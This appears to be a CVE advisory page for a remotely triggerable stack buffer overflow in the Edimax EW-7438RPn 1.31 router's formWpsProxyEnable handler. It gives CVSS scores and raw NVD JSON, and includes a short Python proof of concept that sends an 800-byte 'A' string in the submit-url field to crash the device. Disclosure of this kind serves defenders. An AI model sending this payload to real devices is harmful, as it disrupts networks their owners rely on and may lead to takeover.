Security Vulnerability Report
中文
CVE-2026-9462 CVSS 8.8 HIGH

CVE-2026-9462

Published: 2026-05-25 15:16:23
Last Modified: 2026-05-25 15:16:23
Source: [email protected]

Description

A vulnerability was detected in Edimax EW-7438RPn 1.31. Affected by this vulnerability is the function formWpsProxyEnable of the file /goform/formWpsProxyEnable. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Edimax EW-7438RPn 1.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_poc(target_ip): # Target URL endpoint url = f"http://{target_ip}/goform/formWpsProxyEnable" # Payload: A long string to trigger stack-based buffer overflow # Typically 500-1000 bytes is enough to overflow small buffers in IoT devices payload = { "submit-url": "A" * 800 } try: print(f"[+] Sending payload to {url}...") response = requests.post(url, data=payload, timeout=5) # If the device crashes, it might not return a response or return an error if response.status_code == 200: print("[-] Request sent, but service did not crash immediately. Check device stability.") else: print(f"[!] Received status code: {response.status_code}") except requests.exceptions.RequestException as e: # Connection error often indicates the service crashed (DoS) print(f"[+] Connection error or timeout detected. The target may have crashed (PoC successful).") print(f"[+] Error details: {e}") if __name__ == "__main__": target = "192.168.1.1" # Replace with actual target IP check_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9462", "sourceIdentifier": "[email protected]", "published": "2026-05-25T15:16:23.077", "lastModified": "2026-05-25T15:16:23.077", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Edimax EW-7438RPn 1.31. Affected by this vulnerability is the function formWpsProxyEnable of the file /goform/formWpsProxyEnable. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_15/15.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/813899", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365443", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365443/cti", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.